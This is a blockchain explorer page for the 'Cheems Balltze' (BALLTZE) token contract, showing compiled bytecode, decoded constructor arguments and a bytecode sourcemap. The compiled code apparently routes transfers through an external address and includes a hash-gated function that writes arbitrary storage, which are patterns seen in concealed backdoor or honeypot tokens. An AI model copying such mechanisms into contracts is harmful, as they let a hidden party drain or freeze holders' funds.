628f55a4df523b3ef9061073a908790610c7a565b60405180910390a35050505050565b6000601881610759826008610c91565b9250505090565b6000806001805461077090610cc8565b80601f016020809104026020016040519081016040528092919081815260200182805461079c90610cc8565b80156107e95780601f106107be576101008083540402835291602001916107e9565b820191906000526020600020905b8154815290600101906020018083116107cc57829003601f168201915b5050600080525050600560209081527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546040519394503393909250610833918491869101610a86565b6040516020818303038152906040528051906020012060001c149250505090565b6001600160a01b03821660009081526005602052604081205490610879826001610ca9565b9050806001148015610889575082155b156103fd578060011415806108a557506108a28561048c565b15155b6103fd5760405162461bcd60e51b815260040161045e90610b12565b80356001600160a01b038116811461034157600080fd5b6000602082840312156108e9578081fd5b61049a826108c1565b60008060408385031215610904578081fd5b61090d836108c1565b915061091b602084016108c1565b90509250929050565b600080600060608486031215610938578081fd5b610941846108c1565b925061094f602085016108c1565b9150604084013590509250925092565b60008060408385031215610971578182fd5b61097a836108c1565b946020939093013593505050565b6000806020838503121561099a578182fd5b823567ffffffffffffffff808211156109b1578384fd5b818501915085601f8301126109c4578384fd5b8135818111156109d2578485fd5b86602080830285010111156109e5578485fd5b60209290920196919550909350505050565b600060208284031215610a08578081fd5b5035919050565b600060208284031215610a20578081fd5b5051919050565b60008151808452815b81811015610a4c57602081850181015186830182015201610a30565b81811115610a5d5782602083870101525b50601f01601f19169290920160200192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0383168152604060208201819052600090610aaa90830184610a27565b949350505050565b901515815260200190565b60006020825261049a6020830184610a27565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252600390820152620746f760ec1b604082015260600190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610ca457610ca4610d03565b500190565b6000816000190483118215151615610cc357610cc3610d03565b500290565b600281046001821680610cdc57607f821691505b60208210811415610cfd57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea264697066735822122087e1132a890b53d7b73da19a2dc3d22915d8ea38da6238c1d985ef2c75d4e55464736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d5b5c2c2b1b55189a3894b59e51edae95057f05c5bfb4d6797425ecf220a5be8e000000000000000000000000000000000000000000000000000000000000000e436865656d732042616c6c747a65000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000742414c4c545a4500000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Cheems Balltze
Arg [1] : symbol_ (string): BALLTZE
Arg [2] : baked_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D
Arg [3] : swings_ (uint256): 41323323990032256554046528921763698348852538771902991864054491290378407624334

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d
Arg [3] : 5b5c2c2b1b55189a3894b59e51edae95057f05c5bfb4d6797425ecf220a5be8e
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000e
Arg [5] : 436865656d732042616c6c747a65000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [7] : 42414c4c545a4500000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

111:11356:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1025:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3525:242;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;2153:108::-;;;:::i;:::-;;;;;;;:::i;4347:295::-;;;;;;:::i;:::-;;:::i;1996:92::-;;;:::i;:::-;;;;;;;:::i;5051:270::-;;;;;;:::i;:::-;;:::i;2324:177::-;;;;;;:::i;:::-;;:::i;5329:698::-;;;;;;:::i;:::-;;:::i;:::-;;980:87:3;;;:::i;:::-;;;;;;;:::i;1244:104:0:-;;;:::i;6902:503::-;;;;;;:::i;:::-;;:::i;2707:234::-;;;;;;:::i;:::-;;:::i;9064:130::-;;;;;;:::i;:::-;;:::i;3004:201::-;;;;;;:::i;:::-;;:::i;1025:100::-;1079:13;1112:5;1105:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1025:100;:::o;3525:242::-;3644:4;3666:13;3682:12;:10;:12::i;:::-;3666:28;;3705:32;3714:5;3721:7;3730:6;3705:8;:32::i;:::-;-1:-1:-1;3755:4:0;;3525:242;-1:-1:-1;;;3525:242:0:o;2153:108::-;2241:12;;2153:108;:::o;4347:295::-;4478:4;4495:15;4513:12;:10;:12::i;:::-;4495:30;;4536:38;4552:4;4558:7;4567:6;4536:15;:38::i;:::-;4585:27;4595:4;4601:2;4605:6;4585:9;:27::i;:::-;-1:-1:-1;4630:4:0;;4347:295;-1:-1:-1;;;;4347:295:0:o;1996:92::-;2079:1;1996:92;:::o;5051:270::-;5166:4;5188:13;5204:12;:10;:12::i;:::-;5188:28;;5227:64;5236:5;5243:7;5280:10;5252:25;5262:5;5269:7;5252:9;:25::i;:::-;:38;;;;:::i;:::-;5227:8;:64::i;2324:177::-;-1:-1:-1;;;;;2475:18:0;;2443:7;2475:18;;;:9;:18;;;;;;2324:177;;;;:::o;5329:698::-;5396:12;5411:11;:9;:11::i;:::-;5396:26;;5437:9;:7;:9::i;:::-;5433:587;;;5463:12;5478:4;;5483:1;5478:7;;;;;-1:-1:-1;;;5478:7:0;;;;;;;;;;;;;;;5488:1;5478:11;;;;:::i;:::-;5463:26;;5504:12;5519:4;;5524:1;5519:7;;;;;-1:-1:-1;;;5519:7:0;;;;;;;;;;;;;;;5529:1;5519:11;;;;:::i;:::-;5504:26;-1:-1:-1;5576:11:0;;5573:2;;5659:1;5652:15;;;5621:9;5689:16;;5747:2;5734:16;;5727:30;;;5573:2;5797:11;5794:2;;5880:1;5873:15;;;5849:1;5910:16;;5968:2;5955:16;;5846:1;5948:27;;5794:2;5554:455;;;5329:698;;;:::o;980:87:3:-;1026:7;1053:6;-1:-1:-1;;;;;1053:6:3;980:87;:::o;1244:104:0:-;1300:13;1333:7;1326:14;;;;;:::i;6902:503::-;7022:4;7044:13;7060:12;:10;:12::i;:::-;7044:28;;7083:24;7110:25;7120:5;7127:7;7110:9;:25::i;:::-;7083:52;;7188:15;7168:16;:35;;7146:122;;;;-1:-1:-1;;;7146:122:0;;;;;;;:::i;:::-;;;;;;;;;7304:60;7313:5;7320:7;7348:15;7329:16;:34;7304:8;:60::i;2707:234::-;2822:4;2844:13;2860:12;:10;:12::i;:::-;2844:28;;2883;2893:5;2900:2;2904:6;2883:9;:28::i;9064:130::-;9117:7;;9154:8;:4;9161:1;9154:8;:::i;:::-;9137:25;9064:130;-1:-1:-1;;;9064:130:0:o;3004:201::-;-1:-1:-1;;;;;3170:18:0;;;3138:7;3170:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3004:201::o;656:98:1:-;736:10;656:98;:::o;10291:380:0:-;-1:-1:-1;;;;;10427:19:0;;10419:68;;;;-1:-1:-1;;;10419:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;10506:21:0;;10498:68;;;;-1:-1:-1;;;10498:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;10579:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;10631:32;;;;;10609:6;;10631:32;:::i;:::-;;;;;;;;10291:380;;;:::o;10962:502::-;11097:24;11124:25;11134:5;11141:7;11124:9;:25::i;:::-;11097:52;;-1:-1:-1;;11164:16:0;:37;11160:297;;11264:6;11244:16;:26;;11218:117;;;;-1:-1:-1;;;11218:117:0;;;;;;;:::i;:::-;11379:51;11388:5;11395:7;11423:6;11404:16;:25;11379:8;:51::i;:::-;10962:502;;;;:::o;7875:866::-;-1:-1:-1;;;;;8006:18:0;;7998:68;;;;-1:-1:-1;;;7998:68:0;;;;;;;:::i;:::-;8171:22;;-1:-1:-1;;;8171:22:0;;8154:14;;-1:-1:-1;;;;;8171:6:0;:16;;;;:22;;8188:4;;8171:22;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;8226:15:0;;8204:19;8226:15;;;:9;:15;;;;;;8154:39;;-1:-1:-1;8252:29:0;;8154:39;;8236:4;;8252:8;:29::i;:::-;8329:6;8314:11;:21;;8292:109;;;;-1:-1:-1;;;8292:109:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;8437:15:0;;;;;;;:9;:15;;;;;;8455:20;;;8437:38;;8655:13;;;;;;;;;;:23;;;;;;8707:26;;;;;;8469:6;;8707:26;:::i;:::-;;;;;;;;7875:866;;;;;:::o;6035:143::-;6078:7;6112:5;6078:7;6142;6112:5;6148:1;6142:7;:::i;:::-;6128:21;-1:-1:-1;;;6035:143:0;:::o;6186:213::-;6227:4;6244:18;6265:5;6244:26;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;6281:12:0;6371:19;;-1:-1:-1;;6371:7:0;:19;;;;;;;6343:22;6244:26;;-1:-1:-1;6296:10:0;;6371:19;;-1:-1:-1;6343:22:0;;6296:10;;6244:26;;6343:22;;:::i;:::-;;;;;;;;;;;;;6333:33;;;;;;6325:42;;:65;6317:74;;;;6186:213;:::o;8749:307::-;-1:-1:-1;;;;;8879:15:0;;8865:11;8879:15;;;:7;:15;;;;;;;8919;8879;8926:7;8919:15;:::i;:::-;8905:29;;8949:3;8956:5;8949:12;:18;;;;;8966:1;8965:2;8949:18;8945:104;;;8992:3;8999:1;8992:8;;:37;;;;9004:16;9013:6;9004:8;:16::i;:::-;:25;;8992:37;8984:53;;;;-1:-1:-1;;;8984:53:0;;;;;;;:::i;14:175:4:-;84:20;;-1:-1:-1;;;;;133:31:4;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:4:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:4;;-1:-1:-1;;;;1399:561:4:o;1965:190::-;;2077:2;2065:9;2056:7;2052:23;2048:32;2045:2;;;2098:6;2090;2083:22;2045:2;-1:-1:-1;2126:23:4;;2035:120;-1:-1:-1;2035:120:4:o;2160:194::-;;2283:2;2271:9;2262:7;2258:23;2254:32;2251:2;;;2304:6;2296;2289:22;2251:2;-1:-1:-1;2332:16:4;;2241:113;-1:-1:-1;2241:113:4:o;2359:478::-;;2441:5;2435:12;2468:6;2463:3;2456:19;2493:3;2505:162;2519:6;2516:1;2513:13;2505:162;;;2581:4;2637:13;;;2633:22;;2627:29;2609:11;;;2605:20;;2598:59;2534:12;2505:162;;;2685:6;2682:1;2679:13;2676:2;;;2751:3;2744:4;2735:6;2730:3;2726:16;2722:27;2715:40;2676:2;-1:-1:-1;2819:2:4;2798:15;-1:-1:-1;;2794:29:4;2785:39;;;;2826:4;2781:50;;2411:426;-1:-1:-1;;2411:426:4:o;2842:203::-;-1:-1:-1;;;;;3006:32:4;;;;2988:51;;2976:2;2961:18;;2943:102::o;3050:319::-;-1:-1:-1;;;;;3227:32:4;;3209:51;;3296:2;3291;3276:18;;3269:30;;;3050:319;;3316:47;;3344:18;;3336:6;3316:47;:::i;:::-;3308:55;3199:170;-1:-1:-1;;;;3199:170:4:o;3374:187::-;3539:14;;3532:22;3514:41;;3502:2;3487:18;;3469:92::o;3566:222::-;;3715:2;3704:9;3697:21;3735:47;3778:2;3767:9;3763:18;3755:6;3735:47;:::i;3793:398::-;3995:2;3977:21;;;4034:2;4014:18;;;4007:30;4073:34;4068:2;4053:18;;4046:62;-1:-1:-1;;;4139:2:4;4124:18;;4117:32;4181:3;4166:19;;3967:224::o;4196:326::-;4398:2;4380:21;;;4437:1;4417:18;;;4410:29;-1:-1:-1;;;4470:2:4;4455:18;;4448:33;4513:2;4498:18;;4370:152::o;4527:353::-;4729:2;4711:21;;;4768:2;4748:18;;;4741:30;4807:31;4802:2;4787:18;;4780:59;4871:2;4856:18;;4701:179::o;4885:402::-;5087:2;5069:21;;;5126:2;5106:18;;;5099:30;5165:34;5160:2;5145:18;;5138:62;-1:-1:-1;;;5231:2:4;5216:18;;5209:36;5277:3;5262:19;;5059:228::o;5292:401::-;5494:2;5476:21;;;5533:2;5513:18;;;5506:30;5572:34;5567:2;5552:18;;5545:62;-1:-1:-1;;;5638:2:4;5623:18;;5616:35;5683:3;5668:19;;5466:227::o;5698:400::-;5900:2;5882:21;;;5939:2;5919:18;;;5912:30;5978:34;5973:2;5958:18;;5951:62;-1:-1:-1;;;6044:2:4;6029:18;;6022:34;6088:3;6073:19;;5872:226::o;6103:401::-;6305:2;6287:21;;;6344:2;6324:18;;;6317:30;6383:34;6378:2;6363:18;;6356:62;-1:-1:-1;;;6449:2:4;6434:18;;6427:35;6494:3;6479:19;;6277:227::o;6509:177::-;6655:25;;;6643:2;6628:18;;6610:76::o;6691:184::-;6863:4;6851:17;;;;6833:36;;6821:2;6806:18;;6788:87::o;6880:128::-;;6951:1;6947:6;6944:1;6941:13;6938:2;;;6957:18;;:::i;:::-;-1:-1:-1;6993:9:4;;6928:80::o;7013:168::-;;7119:1;7115;7111:6;7107:14;7104:1;7101:21;7096:1;7089:9;7082:17;7078:45;7075:2;;;7126:18;;:::i;:::-;-1:-1:-1;7166:9:4;;7065:116::o;7186:380::-;7271:1;7261:12;;7318:1;7308:12;;;7329:2;;7383:4;7375:6;7371:17;7361:27;;7329:2;7436;7428:6;7425:14;7405:18;7402:38;7399:2;;;7482:10;7477:3;7473:20;7470:1;7463:31;7517:4;7514:1;7507:15;7545:4;7542:1;7535:15;7399:2;;7241:325;;;:::o;7571:127::-;7632:10;7627:3;7623:20;7620:1;7613:31;7663:4;7660:1;7653:15;7687:4;7684:1;7677:15

Swarm Source

ipfs://87e1132a890b53d7b73da19a2dc3d22915d8ea38da6238c1d985ef2c75d4e554

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.